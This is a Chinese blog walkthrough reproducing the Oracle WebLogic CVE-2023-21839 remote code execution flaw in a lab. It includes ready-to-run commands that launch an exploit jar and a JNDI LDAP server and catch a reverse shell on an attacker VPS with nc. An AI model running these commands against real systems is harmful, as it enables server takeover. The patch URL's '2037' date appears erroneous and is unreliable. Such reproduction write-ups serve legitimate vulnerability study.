Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

admin 2023年2月25日13:07:22评论146 views字数 1332阅读4分26秒阅读模式



网安引领时代,弥天点亮未来   





 

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

0x01漏洞介绍
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell


















Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

0x02影响版本

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0 

Oracle WebLogic Server 14.1.1.0.0



Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

0x03漏洞复现

1.使用docker搭建漏洞环境

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

访问地址

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

2.对漏洞进行复现

1.测试DNSlog出网,生成域名

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

漏洞执行情况

java -jar Weblogic-CVE-2023-21839.jar 192.168.86.6:7001 ldap://kmtgrn.dnslog.cn/mt

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

2.反弹shell

使用JNDIExploit-1.4-SNAPSHOT工具启动ladp服务,加载漏洞利用poc

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

在vps服务器开启

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

nc监听反弹端口

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

执行漏洞利用代码

java -jar Weblogic-CVE-2023-21839.jar 192.168.86.6:7001 ldap://vsp:1389/Basic/ReverseShell/vps/12388

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

成功获得shell

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

简单流量分析

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

执行命令

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell



Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

缓解方式禁用 T3 及 IIOP

https://www.oracle.com/security-alerts/cpujan2037.html


Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

0x05参考链接

https://mp.weixin.qq.com/s/Do9fV3K9VDW_pCPAaWnkbQhttps://mp.weixin.qq.com/s/3JyAFIJ4Isr_p1kTBucLHwhttps://github.com/DXask88MA/Weblogic-CVE-2023-21839https://github.com/WhiteHSBG/JNDIExploit


弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell


原文始发于微信公众号(弥天安全实验室):Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月25日13:07:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shellhttps://cn-sec.com/archives/1573851.html

发表评论

匿名网友 填写信息